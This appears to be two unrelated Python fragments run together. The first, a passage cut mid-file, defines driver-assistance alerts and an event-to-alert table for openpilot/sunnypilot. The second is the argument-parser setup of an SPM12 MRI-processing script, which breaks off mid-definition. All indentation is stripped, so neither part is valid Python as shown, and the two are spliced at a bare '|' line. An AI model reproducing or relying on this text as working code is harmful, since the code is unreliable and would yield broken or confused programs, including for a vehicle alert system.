@property
def names(self):
return self.events
def __len__(self):
return len(self.events)
def add(self, event_name, static=False):
if static:
self.static_events.append(event_name)
self.events.append(event_name)
def clear(self):
self.events_prev = {k: (v + 1 if k in self.events else 0) for k, v in self.events_prev.items()}
self.events = self.static_events.copy()
def any(self, event_type):
for e in self.events:
if event_type in EVENTS.get(e, {}).keys():
return True
return False
def create_alerts(self, event_types, callback_args=None):
if callback_args is None:
callback_args = []
ret = []
for e in self.events:
types = EVENTS[e].keys()
for et in event_types:
if et in types:
alert = EVENTS[e][et]
if not isinstance(alert, Alert):
alert = alert(*callback_args)
if DT_CTRL * (self.events_prev[e] + 1) >= alert.creation_delay:
alert.alert_type = f"{EVENT_NAME[e]}/{et}"
alert.event_type = et
ret.append(alert)
return ret
def add_from_msg(self, events):
for e in events:
self.events.append(e.name.raw)
def to_msg(self):
ret = []
for event_name in self.events:
event = car.CarEvent.new_message()
event.name = event_name
for event_type in EVENTS.get(event_name, {}).keys():
setattr(event, event_type, True)
ret.append(event)
return ret
class Alert:
def __init__(self,
alert_text_1: str,
alert_text_2: str,
alert_status: log.ControlsState.AlertStatus,
alert_size: log.ControlsState.AlertSize,
priority: Priority,
visual_alert: car.CarControl.HUDControl.VisualAlert,
audible_alert: car.CarControl.HUDControl.AudibleAlert,
duration: float,
alert_rate: float = 0.,
creation_delay: float = 0.):
self.alert_text_1 = alert_text_1
self.alert_text_2 = alert_text_2
self.alert_status = alert_status
self.alert_size = alert_size
self.priority = priority
self.visual_alert = visual_alert
self.audible_alert = audible_alert
self.duration = int(duration / DT_CTRL)
self.alert_rate = alert_rate
self.creation_delay = creation_delay
self.alert_type = ""
self.event_type = None
def __str__(self) -> str:
return f"{self.alert_text_1}/{self.alert_text_2} {self.priority} {self.visual_alert} {self.audible_alert}"
def __gt__(self, alert2) -> bool:
return self.priority > alert2.priority
class NoEntryAlert(Alert):
def __init__(self, alert_text_2, visual_alert=VisualAlert.none):
super().__init__("openpilot Unavailable", alert_text_2, AlertStatus.normal,
AlertSize.mid, Priority.LOW, visual_alert,
AudibleAlert.refuse, 3.)
class SoftDisableAlert(Alert):
def __init__(self, alert_text_2):
super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
AlertStatus.userPrompt, AlertSize.full,
Priority.MID, VisualAlert.steerRequired,
AudibleAlert.warningSoft, 2.),
# less harsh version of SoftDisable, where the condition is user-triggered
class UserSoftDisableAlert(SoftDisableAlert):
def __init__(self, alert_text_2):
super().__init__(alert_text_2),
self.alert_text_1 = "openpilot will disengage"
class ImmediateDisableAlert(Alert):
def __init__(self, alert_text_2):
super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.steerRequired,
AudibleAlert.warningImmediate, 4.),
class EngagementAlert(Alert):
def __init__(self, audible_alert: car.CarControl.HUDControl.AudibleAlert):
super().__init__("", "",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none,
audible_alert, .2),
class NormalPermanentAlert(Alert):
def __init__(self, alert_text_1: str, alert_text_2: str = "", duration: float = 0.2, priority: Priority = Priority.LOWER, creation_delay: float = 0.):
super().__init__(alert_text_1, alert_text_2,
AlertStatus.normal, AlertSize.mid if len(alert_text_2) else AlertSize.small,
priority, VisualAlert.none, AudibleAlert.none, duration, creation_delay=creation_delay),
class StartupAlert(Alert):
def __init__(self, alert_text_1: str, alert_text_2: str = "To use MADS, press the LFA or ACC MAIN button", alert_status=AlertStatus.normal):
super().__init__(alert_text_1, alert_text_2,
alert_status, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, 10.),
# ********** helper functions **********
def get_display_speed(speed_ms: float, metric: bool) -> str:
speed = int(round(speed_ms * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH)))
unit = 'km/h' if metric else 'mph'
return f"{speed} {unit}"
# ********** alert callback functions **********
AlertCallbackType = Callable[[car.CarParams, messaging.SubMaster, bool, int], Alert]
def soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
if soft_disable_time < int(0.5 / DT_CTRL):
return ImmediateDisableAlert(alert_text_2)
return SoftDisableAlert(alert_text_2)
return func
def user_soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
if soft_disable_time < int(0.5 / DT_CTRL):
return ImmediateDisableAlert(alert_text_2)
return UserSoftDisableAlert(alert_text_2)
return func
def below_engage_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return NoEntryAlert(f"Speed Below {get_display_speed(CP.minEnableSpeed, metric)}")
def below_steer_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return Alert(
f"Steer Unavailable Below {get_display_speed(CP.minSteerSpeed, metric)}",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.prompt, 0.4)
def calibration_incomplete_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
return Alert(
"Calibration in Progress: %d%%" % sm['liveCalibration'].calPerc,
f"Drive Above {get_display_speed(MIN_SPEED_FILTER, metric)}",
AlertStatus.normal, AlertSize.mid,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2)
def no_gps_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
gps_integrated = sm['peripheralState'].pandaType in [log.PandaState.PandaType.uno, log.PandaState.PandaType.dos]
return Alert(
"Poor GPS reception",
"If sky is visible, contact support" if gps_integrated else "Check GPS antenna placement",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=300.)
def wrong_car_mode_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
text = "Cruise Mode Disabled"
if CP.carName == "honda":
text = "Main Switch Off"
return NoEntryAlert(text)
def joystick_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
axes = sm['testJoystick'].axes
gb, steer = list(axes)[:2] if len(axes) else (0., 0.)
vals = f"Gas: {round(gb * 100.)}%, Steer: {round(steer * 100.)}%"
return NormalPermanentAlert("Joystick Mode", vals)
def speed_limit_adjust_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
speedLimit = sm['longitudinalPlan'].speedLimit
speed = round(speedLimit * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH))
message = f'Adjusting to {speed} {"km/h" if metric else "mph"} speed limit'
return Alert(
message,
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 4.)
EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = {
# ********** events with no alerts **********
EventName.stockFcw: {},
# ********** events only containing alerts displayed in all states **********
EventName.joystickDebug: {
ET.WARNING: joystick_alert,
ET.PERMANENT: NormalPermanentAlert("Joystick Mode"),
},
EventName.controlsInitializing: {
ET.NO_ENTRY: NoEntryAlert("System Initializing"),
},
EventName.startup: {
ET.PERMANENT: StartupAlert("sunnypilot Initialized")
},
EventName.startupMaster: {
ET.PERMANENT: StartupAlert("WARNING: This branch is not tested",
alert_status=AlertStatus.userPrompt),
},
# Car is recognized, but marked as dashcam only
EventName.startupNoControl: {
ET.PERMANENT: StartupAlert("Dashcam mode"),
},
# Car is not recognized
EventName.startupNoCar: {
ET.PERMANENT: StartupAlert("Dashcam mode for unsupported car"),
},
EventName.startupNoFw: {
ET.PERMANENT: StartupAlert("Car Unrecognized",
"Check comma power connections",
alert_status=AlertStatus.userPrompt),
},
EventName.dashcamMode: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
priority=Priority.LOWEST),
},
EventName.invalidLkasSetting: {
ET.PERMANENT: NormalPermanentAlert("Stock LKAS is on",
"Turn off stock LKAS to engage"),
},
EventName.cruiseMismatch: {
#ET.PERMANENT: ImmediateDisableAlert("openpilot failed to cancel cruise"),
},
# Some features or cars are marked as community features. If openpilot
# detects the use of a community feature it switches to dashcam mode
# until these features are allowed using a toggle in settings.
EventName.communityFeatureDisallowed: {
ET.PERMANENT: NormalPermanentAlert("openpilot Unavailable",
"Enable Community Features in Settings"),
},
# openpilot doesn't recognize the car. This switches openpilot into a
# read-only mode. This can be solved by adding your fingerprint.
# See https://github.com/commaai/openpilot/wiki/Fingerprinting for more information
EventName.carUnrecognized: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
"Car Unrecognized",
priority=Priority.LOWEST),
},
EventName.stockAeb: {
ET.PERMANENT: Alert(
"BRAKE!",
"Stock AEB: Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.none, 2.),
ET.NO_ENTRY: NoEntryAlert("Stock AEB: Risk of Collision"),
},
EventName.fcw: {
ET.PERMANENT: Alert(
"BRAKE!",
"Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.warningSoft, 2.),
},
EventName.ldw: {
ET.PERMANENT: Alert(
"Lane Departure Detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.ldw, AudibleAlert.prompt, 3.),
},
# ********** events only containing alerts that display while engaged **********
EventName.gasPressed: {
ET.PRE_ENABLE: Alert(
"Release Gas Pedal to Engage",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .1, creation_delay=1.),
},
# openpilot tries to learn certain parameters about your car by observing
# how the car behaves to steering inputs from both human and openpilot driving.
# This includes:
# - steer ratio: gear ratio of the steering rack. Steering angle divided by tire angle
# - tire stiffness: how much grip your tires have
# - angle offset: most steering angle sensors are offset and measure a non zero angle when driving straight
# This alert is thrown when any of these values exceed a sanity check. This can be caused by
# bad alignment or bad sensor data. If this happens consistently consider creating an issue on GitHub
EventName.vehicleModelInvalid: {
ET.NO_ENTRY: NoEntryAlert("Vehicle Parameter Identification Failed"),
ET.SOFT_DISABLE: soft_disable_alert("Vehicle Parameter Identification Failed"),
},
EventName.steerTempUnavailableSilent: {
ET.WARNING: Alert(
"Steering Temporarily Unavailable",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.prompt, 1.),
},
EventName.preDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.promptDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"Driver Distracted",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverDistracted: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Distracted",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel: No Face Detected",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel",
"Driver Unresponsive",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverUnresponsive: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Unresponsive",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preKeepHandsOnWheel: {
ET.WARNING: Alert(
"No hands on steering wheel detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptKeepHandsOnWheel: {
ET.WARNING: Alert(
"HANDS OFF STEERING WHEEL",
"Place hands on steering wheel",
AlertStatus.critical, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.keepHandsOnWheel: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Driver kept hands off sterring wheel"),
},
EventName.manualRestart: {
ET.WARNING: Alert(
"TAKE CONTROL",
"Resume Driving Manually",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.resumeRequired: {
ET.WARNING: Alert(
"STOPPED",
"Press Resume to Go",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.belowSteerSpeed: {
ET.WARNING: below_steer_speed_alert,
},
EventName.preLaneChangeLeft: {
ET.WARNING: Alert(
"Steer Left to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.preLaneChangeRight: {
ET.WARNING: Alert(
"Steer Right to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.laneChangeBlocked: {
ET.WARNING: Alert(
"Car Detected in Blindspot",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .1),
},
EventName.laneChange: {
ET.WARNING: Alert(
"Changing Lanes",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.manualSteeringRequired: {
ET.WARNING: Alert(
"MADS is OFF",
"Manual Steering Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.disengage, 2.),
},
EventName.manualLongitudinalRequired: {
ET.WARNING: Alert(
"Smart/Adaptive Cruise Control is OFF",
"Manual Gas/Brakes Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.steerSaturated: {
ET.WARNING: Alert(
"Take Control",
"Turn Exceeds Steering Limit",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 1.),
},
# Thrown when the fan is driven at >50% but is not rotating
EventName.fanMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Fan Malfunction", "Contact Support"),
},
# Camera is not outputting frames at a constant framerate
EventName.cameraMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Camera Malfunction", "Contact Support"),
},
# Unused
EventName.gpsMalfunction: {
ET.PERMANENT: NormalPermanentAlert("GPS Malfunction", "Contact Support"),
},
# When the GPS position and localizer diverge the localizer is reset to the
# current GPS position. This alert is thrown when the localizer is reset
# more often than expected.
EventName.localizerMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Sensor Malfunction", "Contact Support"),
},
EventName.speedLimitActive: {
ET.WARNING: Alert(
"Cruise set to speed limit",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.speedLimitValueChange: {
ET.WARNING: speed_limit_adjust_alert,
},
# ********** events that affect controls state transitions **********
EventName.pcmEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.buttonEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.silentButtonEnable: {
ET.ENABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.pcmDisable: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.buttonCancel: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.brakeHold: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.silentBrakeHold: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.parkBrake: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Parking Brake Engaged"),
},
EventName.pedalPressed: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed",
visual_alert=VisualAlert.brakePressed),
},
EventName.silentPedalPressed: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed During Attempt",
visual_alert=VisualAlert.brakePressed),
},
EventName.wrongCarMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: wrong_car_mode_alert,
},
EventName.wrongCruiseMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Adaptive Cruise Disabled"),
},
EventName.steerTempUnavailable: {
ET.SOFT_DISABLE: soft_disable_alert("Steering Temporarily Unavailable"),
ET.NO_ENTRY: NoEntryAlert("Steering Temporarily Unavailable"),
},
EventName.outOfSpace: {
ET.PERMANENT: NormalPermanentAlert("Out of Storage"),
ET.NO_ENTRY: NoEntryAlert("Out of Storage"),
},
EventName.belowEngageSpeed: {
ET.NO_ENTRY: below_engage_speed_alert,
},
EventName.sensorDataInvalid: {
ET.PERMANENT: Alert(
"No Data from Device Sensors",
"Reboot your Device",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("No Data from Device Sensors"),
},
EventName.noGps: {
ET.PERMANENT: no_gps_alert,
},
EventName.soundsUnavailable: {
ET.PERMANENT: NormalPermanentAlert("Speaker not found", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Speaker not found"),
},
EventName.tooDistracted: {
ET.NO_ENTRY: NoEntryAlert("Distraction Level Too High"),
},
EventName.overheat: {
ET.PERMANENT: NormalPermanentAlert("System Overheated"),
ET.SOFT_DISABLE: soft_disable_alert("System Overheated"),
ET.NO_ENTRY: NoEntryAlert("System Overheated"),
},
EventName.wrongGear: {
ET.SOFT_DISABLE: user_soft_disable_alert("Gear not D"),
ET.NO_ENTRY: NoEntryAlert("Gear not D"),
},
EventName.silentWrongGear: {
ET.SOFT_DISABLE: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
ET.NO_ENTRY: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
},
# This alert is thrown when the calibration angles are outside of the acceptable range.
# For example if the device is pointed too much to the left or the right.
# Usually this can only be solved by removing the mount from the windshield completely,
# and attaching while making sure the device is pointed straight forward and is level.
# See https://comma.ai/setup for more information
EventName.calibrationInvalid: {
ET.PERMANENT: NormalPermanentAlert("Calibration Invalid", "Remount Device and Recalibrate"),
ET.SOFT_DISABLE: soft_disable_alert("Calibration Invalid: Remount Device & Recalibrate"),
ET.NO_ENTRY: NoEntryAlert("Calibration Invalid: Remount Device & Recalibrate"),
},
EventName.calibrationIncomplete: {
ET.PERMANENT: calibration_incomplete_alert,
ET.SOFT_DISABLE: soft_disable_alert("Calibration in Progress"),
ET.NO_ENTRY: NoEntryAlert("Calibration in Progress"),
},
EventName.doorOpen: {
ET.SOFT_DISABLE: user_soft_disable_alert("Door Open"),
ET.NO_ENTRY: NoEntryAlert("Door Open"),
},
EventName.seatbeltNotLatched: {
ET.SOFT_DISABLE: user_soft_disable_alert("Seatbelt Unlatched"),
ET.NO_ENTRY: NoEntryAlert("Seatbelt Unlatched"),
},
EventName.espDisabled: {
ET.SOFT_DISABLE: soft_disable_alert("ESP Off"),
ET.NO_ENTRY: NoEntryAlert("ESP Off"),
},
EventName.lowBattery: {
ET.SOFT_DISABLE: soft_disable_alert("Low Battery"),
ET.NO_ENTRY: NoEntryAlert("Low Battery"),
},
# Different openpilot services communicate between each other at a certain
# interval. If communication does not follow the regular schedule this alert
# is thrown. This can mean a service crashed, did not broadcast a message for
# ten times the regular interval, or the average interval is more than 10% too high.
EventName.commIssue: {
ET.SOFT_DISABLE: soft_disable_alert("Communication Issue between Processes"),
ET.NO_ENTRY: NoEntryAlert("Communication Issue between Processes"),
},
# Thrown when manager detects a service exited unexpectedly while driving
EventName.processNotRunning: {
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.radarFault: {
ET.SOFT_DISABLE: soft_disable_alert("Radar Error: Restart the Car"),
ET.NO_ENTRY: NoEntryAlert("Radar Error: Restart the Car"),
},
# Every frame from the camera should be processed by the model. If modeld
# is not processing frames fast enough they have to be dropped. This alert is
# thrown when over 20% of frames are dropped.
EventName.modeldLagging: {
ET.SOFT_DISABLE: soft_disable_alert("Driving model lagging"),
ET.NO_ENTRY: NoEntryAlert("Driving model lagging"),
},
# Besides predicting the path, lane lines and lead car data the model also
# predicts the current velocity and rotation speed of the car. If the model is
# very uncertain about the current velocity while the car is moving, this
# usually means the model has trouble understanding the scene. This is used
# as a heuristic to warn the driver.
EventName.posenetInvalid: {
ET.SOFT_DISABLE: soft_disable_alert("Model Output Uncertain"),
ET.NO_ENTRY: NoEntryAlert("Model Output Uncertain"),
},
# When the localizer detects an acceleration of more than 40 m/s^2 (~4G) we
# alert the driver the device might have fallen from the windshield.
EventName.deviceFalling: {
ET.SOFT_DISABLE: soft_disable_alert("Device Fell Off Mount"),
ET.NO_ENTRY: NoEntryAlert("Device Fell Off Mount"),
},
EventName.lowMemory: {
ET.SOFT_DISABLE: soft_disable_alert("Low Memory: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("Low Memory", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Low Memory: Reboot Your Device"),
},
EventName.highCpuUsage: {
#ET.SOFT_DISABLE: soft_disable_alert("System Malfunction: Reboot Your Device"),
#ET.PERMANENT: NormalPermanentAlert("System Malfunction", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.accFaulted: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Faulted"),
ET.PERMANENT: NormalPermanentAlert("Cruise Faulted", ""),
ET.NO_ENTRY: NoEntryAlert("Cruise Faulted"),
},
EventName.controlsMismatch: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Controls Mismatch"),
},
EventName.roadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.driverCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.wideRoadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
# Sometimes the USB stack on the device can get into a bad state
# causing the connection to the panda to be lost
EventName.usbError: {
ET.SOFT_DISABLE: soft_disable_alert("USB Error: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("USB Error: Reboot Your Device", ""),
ET.NO_ENTRY: NoEntryAlert("USB Error: Reboot Your Device"),
},
# This alert can be thrown for the following reasons:
# - No CAN data received at all
# - CAN data is received, but some message are not received at the right frequency
# If you're not writing a new car port, this is usually cause by faulty wiring
EventName.canError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("CAN Error: Check Connections"),
ET.PERMANENT: Alert(
"CAN Error: Check Connections",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 1., creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("CAN Error: Check Connections"),
},
EventName.steerUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("LKAS Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("LKAS Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("LKAS Fault: Restart the Car"),
},
EventName.brakeUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
EventName.reverseGear: {
ET.PERMANENT: Alert(
"Reverse\nGear",
"",
AlertStatus.normal, AlertSize.full,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2, creation_delay=0.5),
ET.USER_DISABLE: ImmediateDisableAlert("Reverse Gear"),
ET.NO_ENTRY: NoEntryAlert("Reverse Gear"),
},
# On cars that use stock ACC the car can decide to cancel ACC for various reasons.
# When this happens we can no long control the car so the user needs to be warned immediately.
EventName.cruiseDisabled: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Is Off"),
},
# For planning the trajectory Model Predictive Control (MPC) is used. This is
# an optimization algorithm that is not guaranteed to find a feasible solution.
# If no solution is found or the solution has a very high cost this alert is thrown.
EventName.plannerError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Planner Solution Error"),
ET.NO_ENTRY: NoEntryAlert("Planner Solution Error"),
},
# When the relay in the harness box opens the CAN bus between the LKAS camera
# and the rest of the car is separated. When messages from the LKAS camera
# are received on the car side this usually means the relay hasn't opened correctly
# and this alert is thrown.
EventName.relayMalfunction: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Harness Malfunction"),
ET.PERMANENT: NormalPermanentAlert("Harness Malfunction", "Check Hardware"),
ET.NO_ENTRY: NoEntryAlert("Harness Malfunction"),
},
EventName.noTarget: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"No close lead car",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
ET.NO_ENTRY: NoEntryAlert("No Close Lead Car"),
},
EventName.speedTooLow: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"Speed too low",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
},
# When the car is driving faster than most cars in the training data, the model outputs can be unpredictable.
EventName.speedTooHigh: {
ET.WARNING: Alert(
"Speed Too High",
"Model uncertain at this speed",
AlertStatus.userPrompt, AlertSize.mid,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 4.),
ET.NO_ENTRY: NoEntryAlert("Slow down to engage"),
},
EventName.lowSpeedLockout: {
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
}
|
import os,re,glob,sys,argparse,tempfile
from subprocess import Popen, PIPE, run, TimeoutExpired, DEVNULL
import datetime,shlex,time
import nibabel, nibabel.processing
import gzip, shutil
from copy import deepcopy
import sys
if sys.version_info[0] < 3:
raise Exception("Python 3.0+ is needed.")
# Get Arguments
parser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A script to execute spm12 at command line.")
# Positional arugment : command
subparsers=parser.add_subparsers(metavar= 'command', required = True)
parser_convert = subparsers.add_parser('convert', help='convert .m script into commandline-available script.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_convert.set_defaults(command = 'convert')
parser_convert.add_argument('m_script', type=str, help='m script file to convert.')
parser_convert.add_argument('output', type=str, help='output file path.')
parser_gunzip = subparsers.add_parser('gunzip', help='gunzip nii.gz files.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_gunzip.set_defaults(command = 'gunzip')
parser_gunzip.add_argument("root_folder", help="root folder to search mri files.")
parser_gunzip.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_gunzip.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
type=str, nargs='+')
parser_resample = subparsers.add_parser('resample', help='resample a mri image.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_resample.set_defaults(command = 'resample')
parser_resample.add_argument('input_path', type=str, help='nii file to resample.')
parser_resample.add_argument('-vs', "--voxel_size", default=[1,1,1], type=int, help='voxel size(e.g. -vs 2 2 2)', nargs='+')
parser_run = subparsers.add_parser('run', help='run spm12 process pipeline.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_run.set_defaults(command = 'run')
parser_run.add_argument("root_folder", help="root folder to search mri files.")
parser_run.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_run.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
type=str, nargs='+')
parser_run.add_argument("-m", "--m-script-archive", default = "/data/eck/CustomScriptsArchive/spm12_scripts",
help="m-script-archive.",
type=str, nargs='?')
parser_run.add_argument("-rs", "--resample", action="store_true",
help="Whether you want to include resampling step in the run process.",
)
parser_run.add_argument("-ar", "--affine-regularisation", help="ICBM European brains:mni, ICBM east asian:eastern, Average sized template:subj, default no affine regularisation(empty string)", nargs='?', default='')
